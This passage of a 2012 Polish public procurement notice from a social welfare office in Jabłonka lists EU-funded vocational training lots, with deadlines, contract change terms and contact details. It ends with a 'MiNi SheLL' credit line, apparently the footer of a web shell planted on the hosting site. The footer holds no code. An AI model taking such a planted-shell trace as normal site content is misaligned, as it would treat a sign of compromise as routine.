- zmiany miejsca realizacji zajęć, gdy konieczność jej dokonania wynika z przyczyn losowych, niezależnych od Zamawiającego. Zmiana ta nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych; 
- Zmiany ceny - cena jednostkowa będzie mogła ulec zmianie na skutek zmiany stawek podatkowych, dla przedmiotu zamówienia, wystąpienie o zmianę cen jednostkowych przez Wykonawcę musi odbyć się wyprzedzeniem, nie później niż 7 dni przed proponowaną datą zmiany ceny; 
- Zmiany wprowadzone do umowy będą obowiązywały po podpisaniu odpowiedniego aneksu przez obie strony.
- Ilość uczestników projektu (osób biorących udział w poszczególnych szkoleniach/kursach może ulec zmianie - zmniejszeniu lub zwiększeniu). Zamawiający nie ponosi konsekwencji za zmniejszenie ilości uczestników.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jablonka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Jabłonce, ul. 3 Maja 1, 34-480 Jabłonka, pok. 4.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2012 godzina 12:00, miejsce: Ośrodek Pomocy Społecznej, ul. 3-go Maja 1, 34-480 Jabłonka pokój nr 1 - sekretariat UG. Otwarcie ofert nastąpi dnia 24.04.2012 o godz. 12.05, w siedzibie Zamawiającego pok. nr 110 (sala obrad UG).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Projekt współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego
2. Do kontaktowania się z Wykonawcami Zamawiający upoważnia: Przedmiot zamówienia -Pani Krystyna Oskwarek, tel. 182611151, fax 182611148, 182652468.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Szkolenie Warsztaty aktywnego poszukiwania pracy oraz konsultacje indywidualne z doradcą zawodowym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Warsztaty aktywnego poszukiwania pracy oraz konsultacje indywidualne z doradcą zawodowym 
- przewidywana liczba osób - 21
- program warsztatów powinien obejmować 20 godzin dydaktycznych zajęć grupowych (warsztaty aktywnego poszukiwania pracy, tj opracowanie CV, listu motywacyjnego, przygotowanie do rozmowy kwalifikacyjnej)
- konsultacje indywidualne powinny obejmować 3 godziny dydaktyczne na osobę (opracowanie Indywidualnego Planu Działania)
- okres realizacji szkolenia: do 30 czerwca 2012 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Szkolenie Trening kompetencji i umiejętności społecznych oraz konsultacje indywidualne z psychologiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szkolenie Trening kompetencji i umiejętności społecznych oraz konsultacje indywidualne z psychologiem
- przewidywana liczba osób - 21
- program warsztatów powinien obejmować 20 godzin dydaktycznych zajęć grupowych (trening kompetencji społecznych - nauka umiejętności komunikacji interpersonalnej, trening asertywności, trening umiejętności wychowawczych) 
   
- konsultacje indywidualne powinny obejmować 5 godzin dydaktycznych na osobę (- okres realizacji szkolenia: do 30 czerwca 2012 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs w zakresie kucharz, barman, kelner.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs w zakresie kucharz, barman, kelner
- przewidywana liczba osób - 4
- program zajęć teoretycznych i praktycznych powinien obejmować 120 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs w zakresie Przedstawiciel handlowy wraz z prawem jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs w zakresie Przedstawiciel handlowy wraz z prawem jazdy kat. B
- przewidywana liczba osób - 11
- program zajęć teoretycznych i praktycznych powinien obejmować 180 godzin dydaktycznych 
- okres realizacji szkolenia: do 31 października 2012 roku 
- kurs prawa jazdy powinien zakończyć się egzaminem państwowym.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kurs w zakresie Magazynier z obsługą wózka widłowego (silnikowego i elektrycznego) z uprawnieniami do wymiany butli gazowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs w zakresie Magazynier z obsługą wózka widłowego (silnikowego i elektrycznego) z uprawnieniami do wymiany butli gazowej 
- przewidywana liczba osób - 2
- program zajęć teoretycznych i praktycznych powinien obejmować 65 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Kurs w zakresie Opiekun nad osobami starszymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs w zakresie Opiekun nad osobami starszymi
- przewidywana liczba osób - 2
- program zajęć teoretycznych i praktycznych powinien obejmować 120 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Kurs w zakresie Sprzedawca z obsługą komputera i kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs w zakresie Sprzedawca z obsługą komputera i kasy fiskalnej
- przewidywana liczba osób - 1
- program zajęć teoretycznych i praktycznych powinien obejmować 100 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Kurs w zakresie Florysta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs w zakresie Florysta
- przewidywana liczba osób - 1
- program zajęć teoretycznych i praktycznych powinien obejmować 80 godzin dydaktycznych 
- okres realizacji szkolenia: do 30 września 2012 roku.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8, 80.51.00.00-2, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com